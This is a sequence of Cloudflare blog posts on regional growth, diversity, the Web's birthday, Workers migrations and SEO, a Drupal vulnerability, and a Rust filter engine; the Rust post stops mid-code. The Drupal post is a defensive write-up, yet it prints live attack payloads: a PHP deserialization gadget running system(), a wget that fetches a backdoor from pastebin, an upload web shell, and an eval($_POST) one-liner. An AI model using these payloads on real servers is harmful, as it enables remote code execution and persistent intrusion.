One year into my role as Head of Asia for Cloudflare, I wanted to reflect on what we’ve achieved, as well as where we are going next. When I started, I spoke about growing our brand recognition in Asia and optimizing our reach to clients by building up teams and channel partners. I also mentioned a key reason behind my joining was Cloudflare’s mission to help build a better Internet and focus on democratizing Internet tools that were once only available to large companies. I’m delighted to share that we’ve made great progress and are in a strong position to continue our rapid growth. It’s been a wonderful year, and I’m thrilled that I joined the company. There has been a lot going on in our business, as well as in the region. Let’s start with Cloudflare Asia.Cloudflare AsiaOur Singapore team has swelled from 40 people from 11 countries to almost 100 people from 19 nations. Our team is as diverse as our client base and keeps the office lively and innovative. The Cloudflare Singapore TeamOur CustomersThe number of Asian businesses choosing to work with us has more than doubled. You can check out what we’ve been doing with companies like Carousell, Vicroads, and 9GAG. Our relationships span all across the region, from India to Japan, from small business to large organizations, from startups to governments, and a wide variety of verticals from e-commerce to financial services.Our PartnersTo further expand our reach, we signed eight new partners representing seven markets and are in discussion with select others. We even held our first partner enablement bootcamp recently which was a big success. Our First Partner Bootcamp in AsiaOur OfficesWe moved into a larger and wonderful office in Singapore. Customers can come to Frasers Tower to see our Network Operations Center and stunning view of the city. We celebrated this new office and Asian Headquarters opening with two events where our co-founder and COO, Michelle Zatlyn presided. Dignitaries from the Singapore Economic Development Board, Singapore Cyber Security Association and the American Embassy cut the ribbon, and hundreds of customers, partners and friends joined us to kick off the Lunar New Year. Celebrating our new office opening in Feb 2019We have a wonderful community space that we are sharing for meet-ups. Developers, interest groups, and others from the community are welcome to use it. The first group to take advantage of this was IndoTech, a community of Indonesian professionals living in Singapore, who work in tech. IndoTech meetup at the Cloudflare events space Going Down UnderAsia is a large region and we are thrilled to expand to Australia. We have many local customers like AfterpayTouch, Fitness and Lifestyle Group, and the NIB group. We have run Worker focused meetups in Sydney and Melbourne as part of our Real World Serverless roadshow and shared what we learned about Noise on the Internet with at AusNOG and NZNog. Today, we are announcing our expanded Australia presence. Incorporating into a new country is a big step and we’ve taken it. This is a good time to mention that we are hiring. If you want to join Cloudflare in Sydney, please get in touch.Our NetworkCloudflare has 165 data centers around the world. Since I’ve joined a year ago, we’ve added 46 cities globally, including 15 in APAC. We now have data centers in Pakistan and Vietnam. Around 20% of Cloudflare’s globally distributed network is in Asia. Our ProductsWe’ve added a number of great products, which can be found on our blog. Some additions that are especially pertinent to the region include adding UDP capability to Spectrum. Gaming clients typically use custom protocols based on UDP, which legacy systems don’t effectively protect. So our expansion of Spectrum has been eagerly received by the many mobile game developers across the region. Indeed, gamers have been using Spectrum even prior to this launch. One example is a mobile game producer where we protect their login/authentication servers that are TCP-based to mitigate DDoS attacks for the purpose of keeping their servers online for players to be able to log in and play. The world is moving to serverless computing and Cloudflare is leading the way. Many of the companies in APAC are on the forefront of this trend and are leveraging Cloudflare to improve their infrastructure. One client is using Cloudflare Workers to speed up and improve capture rates of their analytics engine.The RegionFrom a regional perspective, many countries in Asia are encouraging businesses to be digital-ready.  Governments around the region are spearheading programs to help SMEs (small and medium-sized enterprises), corporations and government departments take advantage of technology and innovation to capture economic gains. For example, Singapore announced SMEsGoDigital as part of the 2017 budget and Thailand recently launched the Thailand 4.0 initiative.In addition, one interesting aspect of the Asian market is that a higher percentage of companies are using multi-cloud architecture. Whether it’s because these  companies need to cover different countries where one of the large cloud providers (eg AWS, Google Cloud, Microsoft Azure, Alicloud or IBM) is stronger than others, or because companies want to avoid “vendor lock-in”, many companies end up using several cloud compute partners.The Last WordNeedless to say, it has been an exciting year. I am proud of what we have accomplished and looking forward to what we have left to do. Join usGiven all this opportunity for growth, our team in Singapore is hiring! We have roles in Systems Reliability Engineering, Network Engineering, Technical Support Engineering, Solutions Engineering, Customer Success Engineering, Recruiting, Account Executives, Business Development Representatives, Sales Operations, Business Operations, and beyond. Check out our careers page.

Employee resource groups aren't the answer, but they're a first step

Why employee resource groups are important for building a great company culture but they're not enough.Diversity and inclusion is a process. To achieve diversity and inclusion, it’s not enough to hire diverse candidates. Once hired, we must be welcomed by a safe and belonging culture, and our diverse perspectives must be honored by our coworkers.Too many times we are approached by well-meaning companies eager to hire diverse candidates, only to look behind the curtain and discover a company culture where we will not feel safe to be ourselves, and where our perspectives will be ignored. Why would we choose to stay in such an environment? These are the companies where diverse employees leave just as quickly as they join.Employee Resource Groups (ERGs) are an essential part of diversity and inclusion, especially as companies grow larger. Before being heard, or trying to change someone's mind, you need to feel safe. ERGs serve as a safe haven for those with perspectives and experiences that are "diverse" compared to the company as a whole. They are a place to share stories, particular plights, and are a source of stress relief. A place where we can safely show up fully as ourselves, even if at a particular event (like a movie night) no words about these subjects are ever spoken. Even small groups that give the sense of “you belong here” are very much needed and important for building a strong employee community. Having a sense of “I am safe,” “I belong,” “someone else understands my truth” should be established before any of the other steps. That’s where Afroflare comes in here at Cloudflare.But ERGs alone are not enough. They do not help us to feel welcome in a team sync when we are the only person of color. They do not help us feel heard when we are the only diverse perspective in a meeting. Our perspectives need to be incorporated in products, culture, and employee processes — a result which we can call integration. Without integration, a company will not be able to retain these perspectives. So how does integration start? I believe, it starts with empathy.Numerous articles have been written about empathy, diversity, and inclusion. Empathy, by which I mean understanding the struggles of worldly differences, is hard to do in a work setting: understanding the struggle of Jim Crow America, or being a first generation immigrant, or how the person you choose to love outside of work can affect your standing in the job market. Some of these struggles have been ingrained into the culture of a people for generations, as familiar to them as apple pie, and yet those experiences are completely unfamiliar to others of us. So what are we to do?In Brene Brown’s book Dare to Lead, she talks about empathy in a very nuanced way. When I read this section, it had a profound effect on me. And though I encourage you to read the whole book, here is the key idea:We see the world through a set of unique lenses that bring together who we are, where we come from, and our vast experiences. ... One of the signature mistakes with empathy is that we believe we can take our lenses off and look through the lenses of someone else. We can’t. Our lenses are soldered to who we are. What we can do, however, is honor people’s perspectives as truth even when they’re different from ours. 1Getting a seat at the table and mustering the courage to share a new perspective is challenging. Mustering the courage to share when it’s likely that your truth will not be honored because you are the only voice with that perspective is virtually impossible within today’s pervasive “data-driven” culture. Having more than one voice to “second” a thought, to value it, gives it more weight than the one lone voice that can so easily be written off as an outlier or a fluke. I'm never going to be able to count on having a second black, straight, cisgender woman from Baltimore in every discussion. More numbers are not the solution. Honoring people’s perspectives as truth even when they’re different from ours is hard to do for all of us. But unless we each do so for one another, none of our individuality can contribute to our work.This doesn't often happen bottom-up. All the employees at a company don't spontaneously decide to honor each other's truths, and only hire those who do the same. It has to come from the top and it has to be a conscious decision. This leads me back to why Afroflare (Cloudflare's ERG for people of color) and other ERGs like it are so important. They are the first step towards integration, providing that sense of safety and belonging. Combined with leadership that values this specific kind of empathy, we can create a culture where diversity has the safety it needs to speak up, and the ears needed to be heard. We’re not perfect, no company is, but Cloudflare is consistently making efforts to improve and become a more inclusive workplace for all, starting from our founders down. And, Cloudflare is aware of its duty to shed light on our diversity efforts, and speak up about how we’re going to create lasting change in the world by building a better Internet for all.Empathy is great if you can do it. I urge the readers of this blog to simply honor the diverse perspectives of others as truth equally alongside their own. We’d all really win if we consider differing perspectives equally, regardless of the majority opinion, as we are hiring and creating solutions, products, and features. It is only then that our workplaces will begin to reflect the true diversity of the world we live in.Footnote [1] Brown Brené. Dare to Lead: Brave Work, Tough Conversations, Whole Hearts. Random House, 2018.

Happy Birthday to the World Wide Web!

Today, March 12th 2019, marks the 30th birthday of the World Wide Web! Cloudflare is helping to celebrate in coordination with the Web Foundation, as part of a 30 hour commemoration of the many ways in which the Web has changed our lives. As we post this blog, Sir Tim Berners Lee is kicking off his journey of the web at CERN, where he wrote the first web browser. The Web Foundation (@webfoundation) is organizing a Twitter timeline of the web, where each hour corresponds to a year starting now with 1989 at 00:00PT/ 08:00 CET. We (@cloudflare) will be tweeting out milestones in our history and the web’s history, as well as some fun infographics. We hope you will follow the journey on Twitter and contribute your own memories and thoughts to the timeline by tweeting and using #Web30 #ForTheWeb. Celebrate with us and support the Web!

A Node to Workers Story

Node.js allows developers to build web services with JavaScript. However, you're on your own when it comes to registering a domain, setting up DNS, managing the server processes, and setting up builds. There's no reason to manage all these layers on separate platforms. For a site on Cloudflare, these layers can be on a single platform. Serverless technology simplifies developers' lives and reframes our current definition of backend.In this article I will breeze through a simple example of how converting a former Node server into a Worker untangled a part of my teams’ code base. The conversion to Workers for this example can be found at this PR on Github.BackgroundCloudflare Marketplace hosts a variety of apps, most of which are produced by third party developers, but some are produced by Cloudflare employees. The Spotify app is one of those apps that was written by the Cloudflare apps team. This app requires an OAuth flow with Spotify to retrieve the user’s token and gather the playlist, artists, other Spotify profile specific information. While Cloudflare manages the OAuth authentication portion, the app owner - in this case Cloudflare Apps - manages the small integration service that uses the token to call Spotify and formats an appropriate response. Mysteriously, this Spotify OAuth integration broke. Teams at Cloudflare are keen to remain  agile, adaptive, and constantly learning. The current Cloudflare Apps team no longer comprises the original team that developed the  Spotify OAuth integration. As such, this current team had no idea why the app broke. Although we had various alerting and logging systems, the Spotify OAuth server was lost in the cloud. Our first step to tackling the issue was tracking down, where exactly did the OAuth flow live. After shuffling through several of the potential platforms - GCloud, AWS, Digital Ocean.. - we discovered the service was on Heroku.  The more platforms introduced, the more complexity in deploys and access management. I decided to reduce the number of layers in our service by simply creating a serverless Cloudflare Worker with no maintenance, no new logins, and no unique backend configuration.Here’s how I did it.Goodbye NodeThe old service used the Node.js and'/blah', function(request, response) { This states that for every POST to an endpoint /blah, execute the callback function with a request and response object as arguments. Cloudflare Workers are built on top of the Service Workers spec. Instead of mutating the response and calling methods on the response object like in Express, we need to respond to ‘fetch’ events. The code below adds an event listener for fetch events (incoming requests to the worker), receiving a FetchEvent as the first parameter. The FetchEvent has a special method called respondWith that accepts an instance of Response or a Promise which resolves to a Response. addEventListener("fetch", event => { event.respondWith(new Response(‘Hello world!’)); }); To avoid reimplementation of the routing logic in my worker, I made my own app . const app = { get: (endpoint, fn) => { url = new URL(request.url); if (url.pathname === endpoint && request.method === "GET") return fn(request); return null; }, post: (endpoint, fn) => { url = new URL(request.url); if (url.pathname === endpoint && request.method === "POST") return fn(request); return null; } }; Now with app set, I call app.get(..) similar to how I did in Node in my handler. I just need to make sure the handler returns at the correct app. async function handleRequest(request) { lastResponse ="/", async function (request) {..} if (lastResponse) { return lastResponse; } lastResponse = app.get("/", async function (request) { if (lastResponse) { return lastResponse; } lastResponse ensures that we keep listening for all the endpoint methods. The other thing that needs to change is the return of the response. Before that return used response.json(), so the final response would be of JSON type. response.json({ proceed: false, errors: [{type: '400', message: error.toString()}] In workers, I need to return a type Response to the respondWith function. I replaced every instance of response.json or response.sendStatus with a new Response object. return new Response( JSON.stringify({ proceed: false, errors: [{ type: "400", message: res.error }] }, { headers: { ‘Content-Type’: ‘application/json’ } }) Now for the most beautiful part of the transition: delete useless config. Our Express server was set to export app as a module insert credentials so that Heroku or whatever non-serverless server could pick up, run, and build. Though I can import libraries for workers via webpack, for this application, it’s overkill. Also, I have access to fetch and other native service worker functions. const {getJson} = require('simple-fetch') module.exports = function setRoutes (app) { Getting rid of modules and deployment config, I removed the files:Procfile, credentials.json, package.json, development.js, heroku.js, and create-app.js.Routes.js simply becomes worker.js. This was a demo of how workers made my life as a programmer easier. Future developers working with my code can read this code without ever looking at any configuration. Even a purely vanilla bean Javascript developer can come in since there is no managing builds and pulling hair out.With serverless I can now spend time on doing what I love - development.

Diving into Technical SEO using Cloudflare Workers

This is a guest post by Igor Krestov and Dan Taylor. Igor is a lead software developer at, and Dan a lead technical SEO consultant, and has also been credited with coining the term “edge SEO”. is a technical SEO agency with offices in London, Leeds, and Boston, offering bespoke consultancy to brands around the world. You can reach them both via Twitter.With this post we illustrate the potential applications of Cloudflare Workers in relation to search engine optimization, which is more commonly referred to as ‘SEO’ using our research and testing over the past year making Sloth.This post is aimed at readers who are both proficient in writing performant JavaScript, as well as complete newcomers, and less technical stakeholders, who haven’t really written many lines of code before.Endless practical applications to overcome obstaclesWorking with various clients and projects over the years we’ve continuously encountered the same problems and obstacles in getting their websites to a point of “technical SEO excellence”. A lot of these problems come from platform restriction at an enterprise level, legacy tech stacks, incorrect builds, and years of patching together various services and infrastructures.As a team of technical SEO consultants, we can often be left frustrated by these barriers, that often lead to essential fixes and implementations either being not possible or delayed for months (if not years) at a time – and in this time, the business is often losing traffic and revenue.Workers offers us a hail Mary solution to a lot of common frustrations in getting technical SEO implemented, and we believe in the long run can become an integral part of overcoming legacy issues, reducing DevOps costs, speeding up lead times, all in addition to utilising a globally distributed serverless platform with blazing fast cold start times.Creating accessibility at scaleWhen we first started out, we needed to implement simple redirects, which should be easy to create on the majority of platforms but wasn’t supported in this instance.When the second barrier arose, we needed to inject Hreflang tags, cross-linking an old multi-lingual website on a bespoke platform build to an outdated spec. This required experiments to find an efficient way of implementing the tags without increasing latency or adding new code to the server – in a manner befitting of search engine crawling.At this point we had a number of other applications for Workers, with arising need for non-developers to be able to modify and deploy new Worker code. This has since become an idea of Worker code generation, via Web UI or command line.Having established a number of different use cases for Workers, we identified 3 processing phases:Incoming request modification – changing origin request URL or adding authorization headers.Outgoing response modification - adding security headers, Hreflang header injection, logging.Response body modification – injecting/changing content e.g. canonicals, robots and JSON-LDWe wanted to generate lean Worker code, which would enable us to keep each functionality contained and independent of another, and went with an idea of filter chains, which can be used to compose fairly complex request processing.A request chain depicting the path of a request as it is transformed while moving from client to origin server and back again.A key accessibility issue we identified from a non-technical perspective was the goal trying of making this serverless technology accessible to all in SEO, because with understanding comes buy-in from stakeholders. In order to do this, we had to make Workers:Accessible to users who don’t understand how to write JavaScript / Performant JavaScriptProcess of implementation can complement existing deployment processesProcess of implementation is secure (internally and externally)Process of implementation is compliant with data and privacy policiesImplementations must be able to be verified through existing processes and practices (BAU)Before we dive into actual filters, here are partial TypeScript interfaces to illustrate filter APIs:interface FilterExecutor<Type, Context, ReturnType extends Type | void> { apply(filterChain: { next: (c: Context, obj: Type) => ReturnType | Promise<ReturnType> }>, context: Context, obj: Type): ReturnType | Promise<ReturnType>; } interface RequestFilterContext { // Request URL url: URL; // Short-circuit request filters respondWith(response: Response | Promise<Response>): void; // Short-circuit all filters respondWithAndStop(response: Response | Promise<Response>): void; // Add additonal response filter appendResponseFilter(filter: ResponseFilter): void; // Add body filter appendBodyFilter(filter: BodyFilter): void; } interface RequestFilter extends FilterExecutor<Request, RequestFilterContext, Request> { }; interface ResponseFilterContext { readonly startMs: number; readonly endMs: number; readonly url: URL; waitUntil(promise: Promise<any>): void; respondWith(response: Response | Promise<Response>): void; respondWithAndStop(response: Response | Promise<Response>): void; appendBodyFilter(filter: BodyFilter): void; } interface ResponseFilter extends FilterExecutor<Response, ResponseFilterContext, Response> { }; interface BodyFilterContext { waitUntil(promise: Promise<any>): void; } interface ChunkChain { public next: ChunkChain | null; public chunk: Uint8Array; } interface BodyFilter extends MutableFilterExecutor<ChunkChain | null, BodyFilterContext, ChunkChain | null> { }; Request filter — Simple RedirectsFirstly, we would like to point out that this is very niche use case, if your platform supports redirects natively, you should absolutely do it through your platform, but there are a number of limited, legacy or bespoke platforms, where redirects are not supported or are limited, or are charged for (per line) by your hosting or platform. For example, Github Pages only support redirects via HTML refresh meta tag. The most basic redirect filter, would look like this:class RedirectRequestFilter { constructor(redirects) { this.redirects = redirects; } apply(filterChain, context, request) { const redirect = this.redirects[context.url.href]; if (redirect) context.respondWith(new Response('', { status: 301, headers: { 'Location': redirect } })); else return, request); } } const { requestFilterHandle } = self.slothRequire('./worker.js'); requestFilterHandle.append(new RedirectRequestFilter({ "": "" })); You can see it live in Cloudflare’s playground here.The one implemented in Sloth supports basic path matching, hostname matching and query string matching, as well as wildcards.The Sloth dashboard for visually creating and modifying redirects. It is all well and good when you do not have a lot of redirects to manage, but what do you do when size of redirects starts to take up significant memory available to Worker? This is where we faced another scaling issue, in taking a small handful of possible redirects, to the tens of thousands.Managing Redirects with Workers KV and Cuckoo FiltersWell, here is one way you can solve it by using Workers KV - a key-value data store.Instead of hard coding redirects inside Worker code, we will store them inside Workers KV. Naive approach would be to check redirect for each URL. But Workers KV, maximum performance is not reached until a key is being read on the order of once-per-second in any given data center.Alternative could be using a probabilistic data structure, like Cuckoo Filters, stored in KV, possibly split between a couple of keys as KV is limited to 64KB. Such filter flow would be:Retrieve frequently read filter key.Check whether full url (or only pathname) is in the filter.Get redirect from Worker KV using URL as a key. In our tests, we managed to pack 20 thousand redirects into Cuckoo Filter taking up 128KB, split between 2 keys, verified against 100 thousand active URLs with a false-positive rate of 0.5-1%.Body filter - Hreflang InjectionHreflang meta tags need to be placed inside HTML <head> element, so before actually injecting them, we need to find either start or end of the head HTML tag, which in itself is a streaming search problem. The caveat here is that naive method decoding UTF-8 into JavaScript string, performing search, re-encoding back into UTF-8 is fairly slow. Instead, we attempted pure JavaScript search on bytes strings (Uint8Array), which straight away showed promising results. For our use case, we picked the Boyer-Moore-Horspool algorithm as a base of our streaming search, as it is simple, has great average case performance and only requires a pre-processing search pattern, with manual prefix/suffix matching at chunk boundaries.Here is comparison of methods we have tested on Node v10.15.0:| Chunk Size | Method | Ops/s | |------------|--------------------------------------|---------------------| | | | | | 1024 bytes | Boyer-Moore-Horspool over byte array | 163,086 ops/sec | | 1024 bytes | **precomputed BMH over byte array** | **424,948 ops/sec** | | 1024 bytes | decode utf8 into strings & indexOf() | 91,685 ops/sec | | | | | | 2048 bytes | Boyer-Moore-Horspool over byte array | 119,634 ops/sec | | 2048 bytes | **precomputed BMH over byte array** | **232,192 ops/sec** | | 2048 bytes | decode utf8 into strings & indexOf() | 52,787 ops/sec | | | | | | 4096 bytes | Boyer-Moore-Horspool over byte array | 78,729 ops/sec | | 4096 bytes | **precomputed BMH over byte array** | **117,010 ops/sec** | | 4096 bytes | decode utf8 into strings & indexOf() | 25,835 ops/sec |Can we do better?Having achieved decent performance improvement with pure JavaScript search over naive method, we wanted to see whether we can do better. As Workers support WASM, we used rust to build a simple WASM module, which exposed standard rust string search.| Chunk Size | Method | Ops/s | |------------|-------------------------------------|---------------------| | | | | | 1024 bytes | Rust WASM | 348,197 ops/sec | | 1024 bytes | **precomputed BMH over byte array** | **424,948 ops/sec** | | | | | | 2048 bytes | Rust WASM | 225,904 ops/sec | | 2048 bytes | **precomputed BMH over byte array** | **232,192 ops/sec** | | | | | | 4096 bytes | **Rust WASM** | **129,144 ops/sec** | | 4096 bytes | precomputed BMH over byte array | 117,010 ops/sec |As rust version did not use precomputed search pattern, it should be significantly faster, if we precomputed and cached search patterns. In our case, we were searching for a single pattern and stopping once it was found, where pure JavaScript version was fast enough, but if you need multi-pattern, advanced search, WASM is the way to go.We could not record statistically significant change in latency, between basic worker and one with a body filter deployed to production, due to unstable network latency, with a mean response latency of 150ms and 10% 90th percentile standard deviation.What’s next?We believe that Workers and serverless applications can open up new opportunities to overcome a lot of issues faced by the SEO community when working with legacy tech stacks, platform limitations, and heavily congested development queues.We are also investigating whether Workers can allow us to make a more efficient Tag Manager, which bundles and pushes only matching Tags with their code, to minimize number of external requests caused by trackers and thus reduce load on user browser.You can experiment with Cloudflare Workers yourself through Sloth, even if you don’t know how to write JavaScript.

Stopping Drupal’s SA-CORE-2019-003 Vulnerability

On the 20th February 2019, Drupal announced that they had discovered a severe vulnerability and that they would be releasing a patch for it the next day. Drupal is a Content Management System used by many of our customers, which made it important that our WAF protect against the vulnerability as quickly as possible.As soon as Drupal released their patch, we analysed it to establish what kind of payloads could be used against it and created rules to mitigate these. By analysing the patch we were able to put together WAF rules to protect cloudflare customers running Drupal.We identified the type of vulnerability we were dealing within 15 minutes. From here, we were able to deploy rules to block the exploit well before any real attacks were seen.The exploitAs Drupal's release announcement explains, a site is affected if:It has the Drupal 8 RESTful API enabled                                      Or it uses one of the 8 modules found to be affectedFrom looking at the patch we very quickly realised the exploit would be based on deserialization. The option ['allowed_classes' => FALSE] was added as part of the patch to the link and map field types. This indicates that while these items are supposed to receive some serialized PHP, there was no legitimate case for supplying a serialized PHP object.This is important because the easiest way to exploit a deserialization vulnerability in PHP is to supply a serialized Object that is crafted to execute code when deserialized.Making the situation worse was the fact that the deserialization was performed regardless of any authentication.We also realised that this meant blindly blocking all serialized PHP would break their intended functionality, as clearly these fields are supposed to receive specific kinds of serialized PHP, for example arrays or strings. Although as the PHP documentation notes, it’s always a risky thing to deserialize untrusted data, even when restricting the set of data that’s excepted.This blog post from Ambionics does a good job at explaining what a concrete exploitation of the vulnerability looks like, when applied to the Drupal 8 RESTful API.What we caughtAfter the vulnerability was announced, we created several rules to experiment with different ways to build a signature to catch exploit attempts. Within an hour of the Drupal announcement we had deployed these in simulate mode, which logs potentially malicious requests without blocking them. After monitoring for false positives they were then improved them a few times as we tuned them.This culminated in the deploy of rule D0020, which has blocked a number of attackers as shown in the graph below. The rule was already deployed in ‘drop’ mode by the time our first attack was observed at around 7pm UTC on Friday the 22nd of February 2019, and to date it has matched zero false positives. This is less than 48 hours from the announcement from Drupal.Figure 1: Hits on rule D0020, with the first attack seen on the 22th February 2019.These first attacks leveraged the “guzzle/rce1” gadget from phpggc to invoke the linux command “id” via PHP’s “system” function, exactly as ambionics did.'O:24:"GuzzleHttp\Psr7\FnStream":2:{s:33:"GuzzleHttp\Psr7\FnStreammethods";a:1:{s:5:"close";a:2:{i:0;O:23:"GuzzleHttp\HandlerStack":3:{s:32:"GuzzleHttp\HandlerStackhandler";s:2:"id";s:30:"GuzzleHttp\HandlerStackstack";a:1:{i:0;a:1:{i:0;s:6:"system";}}s:31:"GuzzleHttp\HandlerStackcached";b:0;}i:1;s:7:"resolve";}}s:9:"_fn_close";a:2:{i:0;r:4;i:1;s:7:"resolve";}}'' After this we saw several more attempts to use this gadget for executing various payloads, mostly to test whether targeted servers were vulnerable. Things like ‘phpinfo’, echoing strings and performing calculations.The first malicious payload we saw used the same gadget, but this time to save a malicious payload from pastebin onto the user’s server.wget -O 1x.php script would have placed a backdoor on the target system by allowing them to upload files to the server via an HTML form. This would have given the attacker continued access to the system even if it was subsequently patched.<? echo "'XXXXXXXXXXXX"; $cwd = getcwd(); Echo '<center> <form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" /> </form> </center></td></tr> </table><br>'; if (!empty ($_FILES['uploads'])) { move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']); Echo "<script>alert('upload Done'); </script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; } ?> Another malicious payload seen was much more minimal:echo '<?php @eval($_POST['pass']) ?>' > vuln1.phpThis payload creates a small PHP file on the server, which contains the dangerous eval() function. If this hadn’t been blocked, it would have allowed the attacker to issue commands via a single HTTP request to the vuln1.php file that could execute arbitrary commands directly on the potentially vulnerable system.Rates of exploitationThe pattern we saw here is fairly typical of a newly announced vulnerability. Once a vulnerability is published, it doesn’t take long to see real attackers making use of the vulnerability - initially in small numbers with “test” payloads to identify whether the attacks work, but shortly afterwards in much higher numbers, and with more dangerous and subtle payloads. This vulnerability was weaponized within two days of disclosure, but that is by no means the shortest time frame we’ve seen.It’s very hard to patch systems quickly enough to ensure that attackers don’t get through, so products like Cloudflare’s WAF are a vital line of defense against these emerging vulnerabilities.

Building fast interpreters in Rust

In the previous post we described the Firewall Rules architecture and how the different components are integrated together. We also mentioned that we created a configurable Rust library for writing and executing Wireshark®-like filters in different parts of our stack written in Go, Lua, C, C++ and JavaScript Workers.With a mixed set of requirements of performance, memory safety, low memory use, and the capability to be part of other products that we’re working on like Spectrum, Rust stood out as the strongest option.We have now open-sourced this library under our Github account: This post will dive into its design, explain why we didn’t use a parser generator and how our execution engine balances security, runtime performance and compilation cost for the generated filters.Parsing Wireshark syntaxWhen building a custom Domain Specific Language (DSL), the first thing we need to be able to do is parse it. This should result in an intermediate representation (usually called an Abstract Syntax Tree) that can be inspected, traversed, analysed and, potentially, serialised.There are different ways to perform such conversion, such as:Manual char-by-char parsing using state machines, regular expression and/or native string APIs.Parser combinators, which use higher-level functions to combine different parsers together (in Rust-land these are represented by nom, chomp, combine and others).Fully automated generators which, provided with a grammar, can generate a fully working parser for you (examples are peg, pest, LALRPOP, etc.).Wireshark syntaxBut before trying to figure out which approach would work best for us, let’s take a look at some of the simple official Wireshark examples, to understand what we’re dealing with:ip.len le 1500udp contains 81:60:03sip.To contains "a1762"http.request.uri matches "gl=se$"eth.dst == ff:ff:ff:ff:ff:ffip.addr == == ::1You can see that the right hand side of a comparison can be a number, an IPv4 / IPv6 address, a set of bytes or a string. They are used interchangeably, without any special notion of a type, which is fine given that they are easily distinguishable… or are they?Let’s take a look at some IPv6 forms on Wikipedia:2001:0db8:0000:0000:0000:ff00:0042:83292001:db8:0:0:0:ff00:42:83292001:db8::ff00:42:8329So IPv6 can be written as a set of up to 8 colon-separated hexadecimal numbers, each containing up to 4 digits with leading zeros omitted for convenience. This appears suspiciously similar to the syntax for byte sequences. Indeed, if we try writing out a sequence like 2f:31:32:33:34:35:36:37, it’s simultaneously a valid IPv6 and a byte sequence in terms of Wireshark syntax.There is no way of telling what this sequence actually represents without looking at the type of the field it’s being compared with, and if you try using this sequence in Wireshark, you’ll notice that it does just that:ipv6.addr == 2f:31:32:33:34:35:36:37: right hand side is parsed and used as an IPv6 addresshttp.request.uri == 2f:31:32:33:34:35:36:37: right hand side is parsed and used as a byte sequence (will match a URL "/1234567")Are there other examples of such ambiguities? Yup - for example, we can try using a single number with two decimal digits:tcp.port == 80: matches any traffic on the port 80 (HTTP)http.file_data == 80: matches any HTTP request/response with body containing a single byte (0x80)We could also do the same with ethernet address, defined as a separate type in Wireshark, but, for simplicity, we represent it as a regular byte sequence in our implementation, so there is no ambiguity here.Choosing a parsing approachThis is an interesting syntax design decision. It means that we need to store a mapping between field names and types ahead of time - a Scheme, as we call it - and use it for contextual parsing. This restriction also immediately rules out many if not most parser generators.We could still use one of the more sophisticated ones (like LALRPOP) that allow replacing the default regex-based lexer with your own custom code, but at that point we’re so close to having a full parser for our DSL that the complexity outweighs any benefits of using a black-box parser generator.Instead, we went with a manual parsing approach. While (for a good reason) this might sound scary in unsafe languages like C / C++, in Rust all strings are bounds checked by default. Rust also provides a rich string manipulation API, which we can use to build more complex helpers, eventually ending up with a full parser.This approach is, in fact, pretty similar to parser combinators in that the parser doesn’t have to keep state and only passes the unprocessed part of the input down to smaller, narrower scoped functions. Just as in parser combinators, the absence of mutable state also allows to easily test and maintain each of the parsers for different parts of the syntax independently of the others.Compared with popular parser combinator libraries in Rust, one of the differences is that our parsers are not standalone functions but rather types that implement common traits:pub trait Lex<'i>: Sized { fn lex(input: &'i str) -> LexResult<'i, Self>; } pub trait LexWith<'i, E>: Sized { fn lex_with(input: &'i str, extra: E) -> LexResult<'i, Self>; } The lex method or its contextual variant lex_with can either return a successful pair of (instance of the type, rest of input) or a pair of (error kind, relevant input span).The Lex trait is used for target types that can be parsed independently of the context (like field names or literals), while LexWith is used for types that need a Scheme or a part of it to be parsed unambiguously.A bigger difference is that, instead of relying on higher-level functions for parser combinators, we use the usual imperative function call syntax. For example, when we want to perform sequential parsing, all we do is call several parsers in a row, using tuple destructuring for intermediate results:let input = skip_space(input); let (op, input) = CombinedExpr::lex_with(input, scheme)?; let input = skip_space(input); let input = expect(input, ")")?; And, when we want to try different alternatives, we can use native pattern matching and ignore the errors:if let Ok(input) = expect(input, "(") { ... (SimpleExpr::Parenthesized(Box::new(op)), input) } else if let Ok((op, input)) = UnaryOp::lex(input) { ... } else { ... } Finally, when we want to automate parsing of some more complicated common cases - say, enums - Rust provides a powerful macro syntax:lex_enum!(#[repr(u8)] OrderingOp { "eq" | "==" => Equal = EQUAL, "ne" | "!=" => NotEqual = LESS | GREATER, "ge" | ">=" => GreaterThanEqual = GREATER | EQUAL, "le" | "<=" => LessThanEqual = LESS | EQUAL, "gt" | ">" => GreaterThan = GREATER, "lt" | "<" => LessThan = LESS, }); This gives an experience similar to parser generators, while still using native language syntax and keeping us in control of all the implementation details.Execution engineBecause our grammar and operations are fairly simple, initially we used direct AST interpretation by requiring all nodes to implement a trait that includes an execute method.trait Expr<'s> { fn execute(&self, ctx: &ExecutionContext<'s>) -> bool; } The ExecutionContext is pretty similar to a Scheme, but instead of mapping arbitrary field names to their types, it maps them to the runtime input values provided by the caller.As with Scheme, initially ExecutionContext used an internal HashMap for registering these arbitrary String -> RhsValue mappings. During the execute call, the AST implementation would evaluate itself recursively, and look up each field reference in this map, either returning a value or raising an error on missing slots and type mismatches.This worked well enough for an initial implementation, but using a HashMap has a non-trivial cost which we would like to eliminate. We already used a more efficient hasher - Fnv - because we are in control of all keys and so are not worried about hash DoS attacks, but there was still more we could do.Speeding up field accessIf we look at the data structures involved, we can see that the scheme is always well-defined in advance, and all our runtime values in the execution engine are expected to eventually match it, even if the order or a precise set of fields is not guaranteed:So what if we ditch the second map altogether and instead use a fixed-size array of values? Array indexing should be much cheaper than looking up in a map, so it might be well worth the effort.How can we do it? We already know the number of items (thanks to the predefined scheme) so we can use that for the size of the backing storage, and, in order to simulate HashMap “holes” for unset values, we can wrap each item an Option<...>:pub struct ExecutionContext<'e> { scheme: &'e Scheme, values: Box<[Option<LhsValue<'e>>]>, } The only missing piece is an index that could map both structures to each other. As you might remember, Scheme still uses a HashMap for field registration, and a HashMap is normally expected to be randomised and indexed only by the predefined key.While we could wrap a value and an auto-incrementing index together into a custom struct, there is already a better solution: IndexMap. IndexMap is a drop-in replacement for a HashMap that preserves ordering and provides a way to get an index of any element and vice versa - exactly what we needed.After replacing a HashMap in the Scheme with IndexMap, we can change parsing to resolve all the parsed field names to their indices in-place and store that in the AST:impl<'i, 's> LexWith<'i, &'s Scheme> for Field<'s> { fn lex_with(mut input: &'i str, scheme: &'s Scheme) -> LexResult<'i, Self> { ... let field = scheme 